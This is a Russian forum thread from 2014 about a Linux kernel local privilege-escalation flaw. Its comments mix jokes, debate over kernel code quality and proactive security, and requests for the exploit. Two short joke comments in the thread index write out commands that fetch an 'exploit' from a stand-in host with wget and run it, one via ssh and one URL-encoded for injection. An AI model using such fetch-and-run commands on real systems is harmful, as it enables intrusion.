Вариант для распечатки		Пред. тема | След. тема
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы		[ Отслеживать ]

Я ядре Linux выявлена локальная уязвимость, позволяющая подн..., opennews (?), 06-Июн-14, (0) [смотреть все] А эксплоит-то есть, чтобы проверить, работает ли оно Просто у меня из всей массы, emg81 (ok), 11:35 , 06-Июн-14, (11) +1 // Надо замутить , pavlinux (ok), 13:33 , 06-Июн-14, (25) +1 // Пля, работает, во срань , pavlinux (ok), 14:00 , 07-Июн-14, (100) // Где скачать исходники exploit использующий эту уязвимость , KASRU (ok), 17:30 , 25-Июн-14, (118) –1 ты поменьше павлину верь вдобавок 8212 ему и сплойтов никаких не надо, с его, arisu (ok), 18:18 , 25-Июн-14, (119) А я из 16 000 зарегистрированных болезней, болел только поносом Видимо пора за, Аноним (-), 13:38 , 06-Июн-14, (28) +10 // Мойте руки перед едой, чо , Аноним (-), 13:59 , 06-Июн-14, (30) Понос - это не болезнь, а следствие ее , Archnewbie (?), 14:13 , 06-Июн-14, (35) +4 // ответная реакция организма, Аноним (-), 16:32 , 06-Июн-14, (46) Понос - состояние, которое может быть вызвано не только болезнью, бестолочи , клоун (?), 16:37 , 06-Июн-14, (49) –1 А, так вот в чём Вы толк знаете , Michael Shigorin (ok), 17:03 , 06-Июн-14, (53) +5 Включай мозги Нашёл на свалке просроченные продукты Приготовил, сразу съел Ду, клоун (?), 17:38 , 06-Июн-14, (60) –3 ну от слабоумия если,конечно, не жизнь заставила , nickfaces (?), 21:41 , 06-Июн-14, (76) Дизбактериоз , SubGun (ok), 22:42 , 06-Июн-14, (79) –1 Мда Простой вопрос ПОЧЕМУ просроченные продукты вызывают понос И вдогонку , Ivan (??), 23:07 , 06-Июн-14, (81) +1 Биологию ты чтоли не учил в своем дворце Тебе про бактерий не рассказывали Впр, Аноним (-), 09:38 , 07-Июн-14, (96) +2 ага Про экзо и эндотоксины почитай еще , чо (?), 18:52 , 07-Июн-14, (105) Да, у него словесный off иногда даже троллинг модератором посетителя - доста, Аноним (-), 09:33 , 07-Июн-14, (95) +3 Вообще справедливости ради, баланс чуши флуда вбросов к конструктиву, хоть и со , Michael Shigorin (ok), 14:12 , 07-Июн-14, (102) –1 Что-то пока не очень заметно , Аноним (-), 13:47 , 09-Июн-14, (111) +1 Что-то меня ядро Linux начало разочаровывать своими уязвимостями Для Fedora 20 в, Аноним (-), 11:37 , 06-Июн-14, (12) –10 // Вас разочаровывает тот факт, что нашли дырку еще с времен 2 6 32 или тот факт чт, Khariton (ok), 13:45 , 06-Июн-14, (29) +4 // Разочаровывает, что ядро такое большое сложное немодульное и этого не изменить , Аноним (-), 16:33 , 06-Июн-14, (47) // Вы хоть раз в него вообще заглядывали , Michael Shigorin (ok), 16:51 , 06-Июн-14, (52) +4 Нет, а ты , Аноним (-), 17:31 , 06-Июн-14, (56) –1 Для чего тогда прикидываешься тупым попугаем , Аноним (-), 21:07 , 06-Июн-14, (72) +3 Да code --- linux-2 2 5 fs isofs inode c orig Tue Dec 29 21 40 35 1998 lin, Michael Shigorin (ok), 23:24 , 06-Июн-14, (82) +1 чёрт, буратино был тупой сколько уж матом на это ругаюсь, а простая мысль взять, arisu (ok), 01:46 , 07-Июн-14, (86) +1 Так туда ручку для noexec прикрутили где-то в 2 4, если не раньше А тогда прос, Michael Shigorin (ok), 14:16 , 07-Июн-14, (103) Да, и был поражен количеством легаси-гoвна, про которое мне пришлось долго, очен, Аноним (-), 17:52 , 06-Июн-14, (62) –2 Пострадали только Вы , Deffic (?), 20:48 , 06-Июн-14, (68) +3 Оно и пилится в отдельных ветках по факту, а потом уже мерджится Вон у поттеринг, Аноним (-), 21:48 , 06-Июн-14, (77) Попробуй посмотреть как его разрабатывают чтоли, эксперт хренов Заодно узнай чт, Аноним (-), 09:40 , 07-Июн-14, (97) +2 Во второй половине двухтысячных в Firefox выявлялось больше уязвимостей, чем в I, Аноним (-), 14:01 , 06-Июн-14, (31) // Это ничего не означает А измеримое понятие качество кода само по себе нуждаетс, клоун (?), 14:54 , 06-Июн-14, (38) –1 // ну для кого-то может и не существует http habrahabr ru post 220769 , none_first (ok), 17:47 , 06-Июн-14, (61) Почему же Количество багов на тысячу строк - очень даже измеримая сущность с вп, Аноним (-), 09:41 , 07-Июн-14, (98) А мифическое качество кода не измеряется и не определимо чётко Попытка подмен, Andrey Mitrofanov (?), 12:51 , 07-Июн-14, (99) Не термине, а определении, но да Баг багу рознь , Michael Shigorin (ok), 14:05 , 07-Июн-14, (101) Хорошо, больше рута для ондроидов А то когдаа безопасность ДЛЯ пользователя, эт, vitalif (ok), 11:46 , 06-Июн-14, (14) +5 // Для пользователя без мозгов ЛЮБАЯ безопасность против , Сергей (??), 16:36 , 06-Июн-14, (48) +2 боюсь в андроиде нет фьютексов , mr propper 2 (?), 16:41 , 06-Июн-14, (50) // Да кудаж они делись то Улетели на метле , Аноним (-), 21:52 , 06-Июн-14, (78) +1 как хорошо, что у меня centos5 на серверах, Нанобот (ok), 11:50 , 06-Июн-14, (15) // уязвимость локальная, или у вас локалхосты , Аноним (-), 12:10 , 06-Июн-14, (17) +2 // ssh user hostname com wget http somewhere com foo bar exploit exploit , pavlinux (ok), 13:28 , 06-Июн-14, (23) // http 3A 2F 2Fremotehost example com 2F 3Fwget www hackers org 2Fexploit zip 26 2, Аноним (-), 14:35 , 06-Июн-14, (36) +2 В генте уже поправили , Андрей (??), 12:18 , 06-Июн-14, (18) +1 // в дебе вчера и ссл и ядро приехало, Аноним (-), 14:10 , 06-Июн-14, (33) // Подтверждаю Даже для бекпортированной 3 14 - linux-image-3 14-0 bpo 1-amd64 amd, Аноним (-), 16:30 , 06-Июн-14, (45) Новость позитивная Если уязвимость не найдена, то это не значит, что её нет, бо, Sergey722 (ok), 12:20 , 06-Июн-14, (19) +2 // Совершенно верно Новость позитивная Баги были есть и будут всегда Главное что, lucentcode (ok), 12:35 , 06-Июн-14, (20) –2 // от 2010 годаДа, вовремя , Аноним (-), 13:32 , 06-Июн-14, (24) +1 Больше багов, хороших и разных Извините за оффтоп , umbr (ok), 15:39 , 06-Июн-14, (41) –1 Вообще-то найденная уязвимость -- это найденная уязвимость Её ещё надо разобра, Michael Shigorin (ok), 13:03 , 06-Июн-14, (21) –2 // Вы пропустили важный пункт - 3 наказать того кто пропустил уязвимость, потом то, Аноним (-), 13:36 , 06-Июн-14, (27) –3 // типичный корпоративный путь в пропасть насмотрелся надо описывать в деталях к , Ytch (ok), 21:07 , 06-Июн-14, (71) +1 Людям свойственно ошибаться Наказывать человека за то что он человек Хм, удачи, Аноним (-), 09:32 , 07-Июн-14, (94) В альтах уже патч доступен А в прочем кому они нужны , Аноним (-), 14:02 , 06-Июн-14, (32) –3 // Да, конечно доступен , boyarsh (?), 15:51 , 06-Июн-14, (43) +1 И эти самые корпорации, не способные обезопасить ядро собираются улучшать разраб, Аноним (-), 16:18 , 06-Июн-14, (44) –1 Прозвучали различные мнение о том, что лучше Любой софт дырявый Из этого сле, Аноним (-), 19:16 , 06-Июн-14, (64) –2 // Ты не думал что в твоем комментарии логическое противоречии Если все ошибки тру, Аноним (-), 21:03 , 06-Июн-14, (69) Нет Нет Нет Бить палкой по рукам надо тем, кто зря возомнил себя разработчиком , Michael Shigorin (ok), 23:36 , 06-Июн-14, (84) –1 // Нет, Аноним (-), 22:48 , 07-Июн-14, (106) // Нет смысла повторять эхом, тем паче когда примеры известны , Michael Shigorin (ok), 23:28 , 07-Июн-14, (107) Примеры в студию, кроме Альта разумеется , Аноним (-), 01:11 , 09-Июн-14, (108) запросто TeX , arisu (ok), 05:22 , 09-Июн-14, (109) +2 Ага, шикарный пример, которым пользуются целых два с половиной землемера И на э, Аноним (-), 21:56 , 14-Июн-14, (113) –1 ты ошибся сайтом, винфак не здесь , arisu (ok), 21:59 , 14-Июн-14, (114) +1 Слив засчитан, сиди на солнышке грейся , Аноним (-), 02:08 , 15-Июн-14, (115) извини, я не знал, что ты 8212 сливной бачок думал, просто виндоюзер заблуди, arisu (ok), 02:10 , 15-Июн-14, (116) +1 Альт как раз в таком качестве не годится как и любая известная мне ОС , а отдел, Michael Shigorin (ok), 01:27 , 10-Июн-14, (112) DJB делом доказал в qmail и djbdns что это не так Неверный вывод из неверных пре, Аноним (-), 09:23 , 07-Июн-14, (93)   // Отнюдь И вообще-то пример с DJB и другими сторонниками подхода proactive secur, Michael Shigorin (ok), 14:19 , 07-Июн-14, (104)   // Да, тут есть в новой новости иллюстрация - там где про секурный L4 Если ядро ни, Аноним (-), 19:27 , 25-Июн-14, (121)   Что-то они зачастили в последнее время , AX (ok), 21:06 , 06-Июн-14, (70) // Когда действуют в опережение, в этом нет ничего плохого Хуже, когда все шито-кр, Мистер Икс (?), 21:17 , 06-Июн-14, (74) После установки свежего обновления ядра в Ubuntu перестали запускаться куча прог, Аноним (-), 10:14 , 09-Июн-14, (110) –1 Где скачать исходники exploit использующий эту уязвимость , KASRU (ok), 17:28 , 25-Июн-14, (117) 11,12,14,15,18,19,44,64,70,110,117

Сообщения

[Сортировка по времени | RSS]

	93. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."	+/–
	Сообщение от Аноним (-), 07-Июн-14, 09:23
	> Любой софт "дырявый". DJB делом доказал в qmail и djbdns что это не так. > Из этого следует, что лучше путь о них никто не знает. Неверный вывод из неверных предпосылок. > Полагаю это самый разумный компромисс. Полагаю что это похоже на страусиную тактику: если не вижу опасность, значит ее нет. Но это лишь самообман, не более. Хакеры, спецслужбы и прочие - дыры ищут. И эксплуатируют. Забыв поставить в известность производителя. Поэтому чем прозрачнее процесс тем оперативнее фиксы и меньше интервал времени когда о дыре знают плохие парни и не знают все остальные. > Нельзя устранить все ошибки и довести продукт до идеала. Иногда таки можно. Иди сломай djbdns или qmail? Автор штукарь зелени за это помнится давал. Впрочем, штукарь это ерунда: после такого успеха компании желающие нанять тебя как эксперта в области безопасности выстроятся в длинную очередь. > А всяким "кодокопателям" нужно по рукам бить чтобы другие не страдали Не получится. Блэкхэты прекрасно умеют делать все анонимано и втихую, так что комар носа не подточит. Вон с ботнетами как: стада ботов вроде есть, а кто за ними стоит - "ищут пожарные, ищет милиция, ищут давно но не могут найти". Иногда конечно показательно мочат кого-то, но если просто посмотреть на трафф в сети - можно заметить что ботов (и ботоводов, соответственно) меньше вовсе не становится. > Палка с двумя концами. Хотели как лучше, а вышло как всегда... Есть только 1 способ удавить баги - выловить и починить. Врать о том что их нет - самонае...лово или, того хуже, осознанное очковтирательство.
	Ответить | Правка | К родителю #64 | Наверх | Cообщить модератору

	104. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."	+/–
	Сообщение от Michael Shigorin (ok), 07-Июн-14, 14:19
	> Есть только 1 способ удавить баги - выловить и починить. Отнюдь.  И вообще-то пример с DJB и другими сторонниками подхода proactive security -- это как раз иллюстрация обратного: "чисто не там, где убирают, а там, где не гадят".  Хотя для индустрии этот подход и впрямь менее понятен -- потому как нужны высококлассные специалисты, а не взаимозаменяемые "менеджеры безопасности" (не в упрёк высококлассным специалистам среди менеджеров, ну да они и так поймут, даже если наткнутся на эти слова).
	Ответить | Правка | Наверх | Cообщить модератору

	121. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."	+/–
	Сообщение от Аноним (-), 25-Июн-14, 19:27
	> Отнюдь.  И вообще-то пример с DJB и другими сторонниками подхода proactive > security -- это как раз иллюстрация обратного: Да, тут есть в новой новости иллюстрация - там где про секурный L4. Если ядро ничего не умеет - то и багов в нем нет. Это, конечно, логично, но... если чуть продолжить эту мысль, можно немного повысить безопасность, отключив питание компьютера. К сожалению, это несколько понижает полезность компьютера. Ну вот и грызут небезопасные кактусы...
	Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема